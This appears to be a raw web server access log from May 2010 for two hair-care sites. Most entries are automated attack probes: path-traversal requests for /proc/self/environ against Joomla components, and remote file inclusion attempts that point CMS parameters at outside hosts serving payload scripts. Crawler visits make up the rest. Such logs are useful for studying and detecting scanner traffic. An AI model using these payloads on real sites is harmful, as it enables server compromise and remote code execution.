65.49.28.194 - - [31/May/2010:04:55:28 -0700] "GET /logs/access.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
203.72.226.120 - - [31/May/2010:04:55:40 -0700] "GET /logs/access_100510.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.72.226.120 - - [31/May/2010:04:55:40 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.72.226.120 - - [31/May/2010:04:55:41 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:04:56:52 -0700] "GET /freehairsecretsphp/vie HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
203.72.226.120 - - [31/May/2010:04:57:21 -0700] "GET /logs/access.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.113.195.20 - - [31/May/2010:04:59:22 -0700] "GET /logs//include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [31/May/2010:04:59:22 -0700] "GET /logs/access_100405.log%20%20//include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [31/May/2010:04:59:22 -0700] "GET /include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [31/May/2010:04:59:22 -0700] "GET /logs//include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [31/May/2010:04:59:22 -0700] "GET /logs/access_100405.log%20%20//include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [31/May/2010:04:59:22 -0700] "GET /include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [31/May/2010:05:01:05 -0700] "GET /include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [31/May/2010:05:01:05 -0700] "GET /logs/access_100405.log//include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [31/May/2010:05:01:05 -0700] "GET /logs//include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [31/May/2010:05:01:11 -0700] "GET /logs//include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [31/May/2010:05:01:11 -0700] "GET /logs/access_100405.log//include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [31/May/2010:05:01:12 -0700] "GET /include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [31/May/2010:05:03:42 -0700] "GET /include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.113.195.20 - - [31/May/2010:05:03:42 -0700] "GET /logs//include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.113.195.20 - - [31/May/2010:05:03:42 -0700] "GET /logs/access.log//include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.113.195.20 - - [31/May/2010:05:04:01 -0700] "GET /logs//include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.113.195.20 - - [31/May/2010:05:04:01 -0700] "GET /include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.113.195.20 - - [31/May/2010:05:04:01 -0700] "GET /logs/access.log//include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.210.98.40 - - [31/May/2010:05:04:15 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
67.210.98.40 - - [31/May/2010:05:04:15 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
67.210.98.40 - - [31/May/2010:05:04:15 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
208.113.195.20 - - [31/May/2010:05:06:05 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.113.195.20 - - [31/May/2010:05:06:05 -0700] "GET /logs//include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.113.195.20 - - [31/May/2010:05:06:05 -0700] "GET /include/write.php?dir=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [31/May/2010:05:19:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6515 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
174.34.163.101 - - [31/May/2010:05:21:15 -0700] "GET /logs/access.log%20%20/errors.php?error=http://kangnung.org/zb/s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.34.163.101 - - [31/May/2010:05:21:15 -0700] "GET /errors.php?error=http://kangnung.org/zb/s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.34.163.101 - - [31/May/2010:05:21:15 -0700] "GET /logs/errors.php?error=http://kangnung.org/zb/s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.34.163.101 - - [31/May/2010:05:21:17 -0700] "GET /logs/access.log%20%20/errors.php?error=http://kangnung.org/zb/s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.34.163.101 - - [31/May/2010:05:21:17 -0700] "GET /errors.php?error=http://kangnung.org/zb/s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.34.163.101 - - [31/May/2010:05:21:17 -0700] "GET /logs/errors.php?error=http://kangnung.org/zb/s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.34.163.101 - - [31/May/2010:05:22:03 -0700] "GET /logs/access_100412.log%20%20/errors.php?error=http://kangnung.org/zb/s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.34.163.101 - - [31/May/2010:05:22:03 -0700] "GET /logs/access_100412.log%20%20/errors.php?error=http://kangnung.org/zb/s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.190.166.35 - - [31/May/2010:05:24:19 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
195.190.166.35 - - [31/May/2010:05:24:19 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
195.190.166.35 - - [31/May/2010:05:24:19 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
195.190.166.35 - - [31/May/2010:05:24:40 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
195.190.166.35 - - [31/May/2010:05:24:40 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
195.190.166.35 - - [31/May/2010:05:24:40 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
121.88.4.141 - - [31/May/2010:05:28:07 -0700] "GET /index.php?option=com_admin&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
174.34.163.101 - - [31/May/2010:05:30:38 -0700] "GET /logs/access.log/errors.php?error=http://kangnung.org/zb/s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.34.163.101 - - [31/May/2010:05:31:08 -0700] "GET /logs/access.log/errors.php?error=http://kangnung.org/zb/s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.55.146.200 - - [31/May/2010:05:31:50 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
72.55.146.200 - - [31/May/2010:05:31:50 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
72.55.146.200 - - [31/May/2010:05:31:50 -0700] "GET /logs/access.log%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.238.145.196 - - [31/May/2010:05:32:35 -0700] "GET /errors.php?error=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:05:32:35 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:05:32:35 -0700] "GET /logs/errors.php?error=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:05:32:57 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:05:32:57 -0700] "GET /errors.php?error=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:05:32:57 -0700] "GET /logs/errors.php?error=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:05:33:10 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13133 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
72.55.146.200 - - [31/May/2010:05:34:47 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [31/May/2010:05:34:47 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [31/May/2010:05:34:47 -0700] "GET /logs/access_100412.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [31/May/2010:05:35:04 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:05:35:42 -0700] "GET /logs/access_100412.log%20%20/errors.php?error=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:05:36:18 -0700] "GET /logs/access_100412.log%20%20/errors.php?error=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
38.101.148.126 - - [31/May/2010:05:37:41 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html" "growlonghairfast.com"
38.101.148.126 - - [31/May/2010:05:37:56 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 851968 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html" "growlonghairfast.com"
211.19.31.123 - - [31/May/2010:05:38:13 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.19.31.123 - - [31/May/2010:05:38:44 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
211.19.31.123 - - [31/May/2010:05:38:46 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
211.19.31.123 - - [31/May/2010:05:39:15 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
211.19.31.123 - - [31/May/2010:05:39:46 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:05:43:08 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5352 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
213.196.180.250 - - [31/May/2010:05:43:27 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.196.180.250 - - [31/May/2010:05:43:27 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.196.180.250 - - [31/May/2010:05:43:27 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.196.180.250 - - [31/May/2010:05:43:35 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.196.180.250 - - [31/May/2010:05:43:35 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.196.180.250 - - [31/May/2010:05:43:35 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.19.31.123 - - [31/May/2010:05:46:06 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.19.31.123 - - [31/May/2010:05:46:07 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.19.31.123 - - [31/May/2010:05:46:07 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.19.31.123 - - [31/May/2010:05:47:38 -0700] "GET /logs/access.log/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.19.31.123 - - [31/May/2010:05:47:39 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
211.19.31.123 - - [31/May/2010:05:47:39 -0700] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5657 "-" "libwww-perl/5.805" "growlonghairfast.com"
119.63.198.83 - - [31/May/2010:05:50:24 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13819 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
211.19.31.123 - - [31/May/2010:05:54:44 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.19.31.123 - - [31/May/2010:05:54:45 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.19.31.123 - - [31/May/2010:05:54:45 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
216.129.119.12 - - [31/May/2010:05:55:56 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
220.73.161.132 - - [31/May/2010:05:56:11 -0700] "GET /com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://xovev.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [31/May/2010:05:56:11 -0700] "GET /logs/access_100412.log%20%20//com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://xovev.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [31/May/2010:05:56:11 -0700] "GET /logs//com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://xovev.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [31/May/2010:05:56:32 -0700] "GET /logs/access_100125.log%20%20//com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://xovev.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:06:00:02 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:06:00:03 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:06:00:07 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:06:00:41 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:06:00:43 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:06:00:43 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:06:02:53 -0700] "GET /logs/access_100412.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:06:03:45 -0700] "GET /logs/access_100412.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.80.193.30 - - [31/May/2010:06:04:38 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; BellSouth/1.0.0; FunWebProducts; .NET CLR 1.1.4322)" "www.growlonghairfast.com"
77.88.25.28 - - [31/May/2010:06:05:23 -0700] "GET /logs/access_090803.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
216.129.119.43 - - [31/May/2010:06:05:44 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
66.249.65.119 - - [31/May/2010:06:06:26 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
89.238.145.196 - - [31/May/2010:06:06:39 -0700] "GET /logs/access.log/errors.php?error=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:06:07:50 -0700] "GET /logs/access.log/errors.php?error=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:06:08:32 -0700] "GET /logs/access_100412.log/errors.php?error=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.240 - - [31/May/2010:06:08:50 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "growlonghairfast.com"
91.212.226.240 - - [31/May/2010:06:08:50 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "growlonghairfast.com"
72.18.137.210 - - [31/May/2010:06:08:55 -0700] "GET /logs//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.18.137.210 - - [31/May/2010:06:08:55 -0700] "GET /modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.18.137.210 - - [31/May/2010:06:08:55 -0700] "GET /logs/access_091221.log%20%20//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.18.137.210 - - [31/May/2010:06:08:59 -0700] "GET /logs//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.18.137.210 - - [31/May/2010:06:08:59 -0700] "GET /modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.18.137.210 - - [31/May/2010:06:08:59 -0700] "GET /logs/access_091221.log%20%20//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:06:09:35 -0700] "GET /logs/access_100412.log/errors.php?error=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [31/May/2010:06:10:16 -0700] "GET /logs/access_100125.log//index.php?option=com_admin&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [31/May/2010:06:10:17 -0700] "GET /index.php?option=com_admin&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [31/May/2010:06:10:17 -0700] "GET /logs//index.php?option=com_admin&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.129.119.41 - - [31/May/2010:06:11:28 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
67.195.111.39 - - [31/May/2010:06:12:33 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
67.195.111.39 - - [31/May/2010:06:12:33 -0700] "GET /?M=A HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
212.91.137.94 - - [31/May/2010:06:16:46 -0700] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.91.137.94 - - [31/May/2010:06:16:46 -0700] "GET /skin/zero_vote/setup.php?dir=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.91.137.94 - - [31/May/2010:06:16:46 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
